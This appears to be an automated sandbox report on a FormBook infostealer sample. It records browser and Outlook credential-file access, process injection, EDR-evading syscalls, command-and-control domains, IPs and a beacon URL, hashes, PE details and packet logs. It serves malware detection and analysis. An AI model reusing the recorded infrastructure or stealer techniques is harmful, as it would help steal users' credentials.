              Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\PATHPING.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3295294820.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3295074777.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3294293351.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2955366160.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3295299661.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Valid Accounts              		Windows Management Instrumentation1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Valid Accounts              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory13
              System Information Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Valid Accounts              		1
              Abuse Elevation Control Mechanism              		Security Account Manager21
              Security Software Discovery              		SMB/Windows Admin Shares1
              Email Collection              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Access Token Manipulation              		4
              Obfuscated Files or Information              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture3
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
              Process Injection              		2
              Software Packing              		LSA Secrets41
              Virtualization/Sandbox Evasion              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Valid Accounts              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
              Virtualization/Sandbox Evasion              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd612
              Process Injection              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
              Hidden Files and Directories              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428881 Sample: rFV23+17555.exe Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 28 www.66bm99.shop 2->28 30 www.dhgorm.top 2->30 32 ccxx.cat-dragon-diiojsofso.com 2->32 40 Malicious sample detected (through community Yara rule) 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected FormBook 2->44 46 3 other signatures 2->46 10 rFV23+17555.exe 3 2->10         started        signatures3 process4 signatures5 58 Writes to foreign memory regions 10->58 60 Allocates memory in foreign processes 10->60 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 10->62 64 Injects a PE file into a foreign processes 10->64 13 AddInProcess32.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 gxDswOWWlPEzerVr.exe 13->16 injected process8 signatures9 38 Found direct / indirect Syscall (likely to bypass EDR) 16->38 19 PATHPING.EXE 13 16->19         started        process10 signatures11 48 Tries to steal Mail credentials (via file / registry access) 19->48 50 Tries to harvest and steal browser information (history, passwords, etc) 19->50 52 Modifies the context of a thread in another process (thread injection) 19->52 54 2 other signatures 19->54 22 gxDswOWWlPEzerVr.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.dhgorm.top 108.186.14.193, 49720, 49721, 49722 PEGTECHINCUS United States 22->34 36 ccxx.cat-dragon-diiojsofso.com 134.122.178.173, 49719, 80 BCPL-SGBGPNETGlobalASNSG United States 22->36 56 Found direct / indirect Syscall (likely to bypass EDR) 22->56 signatures14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              rFV23+17555.exe58%ReversingLabsByteCode-MSIL.Trojan.FormBook
              rFV23+17555.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.dhgorm.top
              		108.186.14.193
              		truefalse
                		unknown
                ccxx.cat-dragon-diiojsofso.com
                		134.122.178.173
                		truefalse
                  		unknown
                  www.66bm99.shop
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.dhgorm.top/s8hu/false
                      		unknown
                      http://www.66bm99.shop/s8hu/?UPVdm=spiDyH1b3uFUsTZxkISg08MBQMtSMA3+DyfgsgsxVWVMb+cPydsAHF754/iEUPAVeA5OBQjW9+XTnykROPWO/pmJGuCBnJv2R6Kqa3nD4OdTG3fimHjEv0IbRXA2Kbqi0w==&4tDdP=cl18T6Apfalse
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://ac.ecosia.org/autocomplete?q=PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/chrome_newtabPATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.dhgorm.topgxDswOWWlPEzerVr.exe, 00000008.00000002.3295074777.0000000002EC0000.00000040.80000000.00040000.00000000.sdmpfalse
                                    		unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoPATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.ecosia.org/newtab/PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=PATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPATHPING.EXE, 00000007.00000003.3132762724.000000000738D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            134.122.178.173
                                            		ccxx.cat-dragon-diiojsofso.comUnited States
                                            		64050BCPL-SGBGPNETGlobalASNSGfalse
                                            108.186.14.193
                                            		www.dhgorm.topUnited States
                                            		54600PEGTECHINCUSfalse

                                            General Information

                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1428881
                                            Start date and time:2024-04-19 19:10:07 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 58s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:2
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:rFV23+17555.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@3/2
                                            EGA Information:
                                            • Successful, ratio: 75%
                                            HCA Information:
                                            • Successful, ratio: 93%
                                            • Number of executed functions: 168
                                            • Number of non-executed functions: 147
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • VT rate limit hit for: rFV23+17555.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            19:11:05API Interceptor218x Sleep call for process: rFV23+17555.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            108.186.14.193inpau292101.jsGet hashmaliciousFormBookBrowse
                                            • www.dhgorm.top/h4wu/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ccxx.cat-dragon-diiojsofso.comRFQ.exeGet hashmaliciousFormBookBrowse
                                            • 134.122.178.172
                                            fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                            • 134.122.178.171
                                            PO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                            • 134.122.178.172
                                            www.dhgorm.topinpau292101.jsGet hashmaliciousFormBookBrowse
                                            • 108.186.14.193

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            BCPL-SGBGPNETGlobalASNSGSecuriteInfo.com.FileRepMalware.1008.15763.exeGet hashmaliciousUnknownBrowse
                                            • 1.32.247.27
                                            RFQ.exeGet hashmaliciousFormBookBrowse
                                            • 134.122.178.172
                                            fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                            • 134.122.178.171
                                            https://euet-ss.xyz/Login/register/Lang/en-usGet hashmaliciousUnknownBrowse
                                            • 216.83.40.249
                                            https://smbc-waz12.shop/Get hashmaliciousUnknownBrowse
                                            • 134.122.188.167
                                            https://www.wangyubo001.com/loginGet hashmaliciousUnknownBrowse
                                            • 134.122.186.220
                                            https://www.tietieclub.com/loginGet hashmaliciousUnknownBrowse
                                            • 134.122.186.220
                                            BoTl06PDGl.exeGet hashmaliciousFormBookBrowse
                                            • 27.124.43.131
                                            r6WrUcBg7ToYT8S.exeGet hashmaliciousFormBookBrowse
                                            • 27.124.43.131
                                            #U5f8b#U5e08#U51fd.rtfGet hashmaliciousUnknownBrowse
                                            • 216.83.46.104
                                            PEGTECHINCUSYui1pUgieI.elfGet hashmaliciousMiraiBrowse
                                            • 165.3.147.175
                                            2x6j7GSmbu.exeGet hashmaliciousFormBookBrowse
                                            • 137.175.115.33
                                            GjWh3Nar5c.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 156.243.131.8
                                            eTASxT3bjO.elfGet hashmaliciousXorDDoSBrowse
                                            • 199.188.111.217
                                            POR5tal0Pt.elfGet hashmaliciousMiraiBrowse
                                            • 199.33.215.90
                                            BxTzBn7FT0.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 156.243.156.249
                                            uOMKZwL0nj.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 156.247.76.169
                                            6H5iAAbeiB.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 156.247.76.139
                                            KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                            • 137.175.115.33
                                            wa3HVGbhyX.elfGet hashmaliciousMiraiBrowse
                                            • 108.186.219.248

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rFV23+17555.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\rFV23+17555.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                            MD5:E193AFF55D4BDD9951CB4287A7D79653
                                            SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                            SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                            SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                            Malicious:false
                                            Reputation:low
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                            C:\Users\user\AppData\Local\Temp\-0o5F4M6

                                            Download File
                                            Process:C:\Windows\SysWOW64\PATHPING.EXE
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                            Category:dropped
                                            Size (bytes):196608
                                            Entropy (8bit):1.121297215059106
                                            Encrypted:false
                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.202462293289798
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:rFV23+17555.exe
                                            File size:922'624 bytes
                                            MD5:265a61c55a5139ac2ff0d9c53a64e1b1
                                            SHA1:edcc6a5534fbf0caa31a0e18d3c9f6b4e114465c
                                            SHA256:67611434a84b916587bc6a7f815cbe39f72c6403d304b1f1274d91e089e6527e
                                            SHA512:ee097f6e2890c86582746ed4a6d22246c2107647b47c2b62f6879171972ea65670712fdcbf56dd30e1f21c20a44c2d79880a5253537a02c5911ace3d9a055ea0
                                            SSDEEP:12288:TBnDbMkGXhp7add045tOe/l5ufa3i5ugvLf4Rk7F86JcbjCLt86:TlDokGXhp7adOQOaWPTvc6nDi6
                                            TLSH:ED15124B2BC45561D8BEBD36A3B8A08082F5F29F5951E7DF145000E4BBB1709EE91BB3
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]b.............................(... ...@....@.. ....................................`................................

                                            File Icon

                                            Icon Hash:00928e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x4e288e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x625DBDD8 [Mon Apr 18 19:36:56 2022 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xe28380x53.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xe40000x40c.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xe60000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xe08940xe0a00a593963bbcfe225763cda2c23a5967a4False0.7980890459794101data7.2118981198836964IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xe40000x40c0x6007ac7e1d8b9664d9f2bbb67357c3d93a6False0.2916666666666667data2.5759611917616576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xe60000xc0x200455c12cef119854ce7b34c78c4b2fb41False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0xe40580x3b4data0.4356540084388186

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 19, 2024 19:12:44.637260914 CEST4971980192.168.2.5134.122.178.173
                                            Apr 19, 2024 19:12:45.012444973 CEST8049719134.122.178.173192.168.2.5
                                            Apr 19, 2024 19:12:45.012567997 CEST4971980192.168.2.5134.122.178.173
                                            Apr 19, 2024 19:12:45.015360117 CEST4971980192.168.2.5134.122.178.173
                                            Apr 19, 2024 19:12:45.386759996 CEST8049719134.122.178.173192.168.2.5
                                            Apr 19, 2024 19:12:45.520473003 CEST8049719134.122.178.173192.168.2.5
                                            Apr 19, 2024 19:12:45.521181107 CEST8049719134.122.178.173192.168.2.5
                                            Apr 19, 2024 19:12:45.521265984 CEST8049719134.122.178.173192.168.2.5
                                            Apr 19, 2024 19:12:45.521270990 CEST4971980192.168.2.5134.122.178.173
                                            Apr 19, 2024 19:12:45.522113085 CEST8049719134.122.178.173192.168.2.5
                                            Apr 19, 2024 19:12:45.522165060 CEST4971980192.168.2.5134.122.178.173
                                            Apr 19, 2024 19:12:45.522998095 CEST8049719134.122.178.173192.168.2.5
                                            Apr 19, 2024 19:12:45.523045063 CEST8049719134.122.178.173192.168.2.5
                                            Apr 19, 2024 19:12:45.523169041 CEST4971980192.168.2.5134.122.178.173
                                            Apr 19, 2024 19:12:45.553004980 CEST8049719134.122.178.173192.168.2.5
                                            Apr 19, 2024 19:12:45.553178072 CEST4971980192.168.2.5134.122.178.173
                                            Apr 19, 2024 19:12:45.557605028 CEST4971980192.168.2.5134.122.178.173
                                            Apr 19, 2024 19:12:45.929116011 CEST8049719134.122.178.173192.168.2.5
                                            Apr 19, 2024 19:13:01.684184074 CEST4972080192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:01.852315903 CEST8049720108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:01.852427959 CEST4972080192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:01.854305029 CEST4972080192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:02.022003889 CEST8049720108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:02.022036076 CEST8049720108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:02.022053957 CEST8049720108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:02.022073030 CEST8049720108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:02.022165060 CEST4972080192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:03.365498066 CEST4972080192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:04.385046959 CEST4972180192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:04.552139044 CEST8049721108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:04.552278042 CEST4972180192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:04.554280043 CEST4972180192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:04.721723080 CEST8049721108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:04.721739054 CEST8049721108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:04.721750975 CEST8049721108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:04.721766949 CEST8049721108.186.14.193192.168.2.5
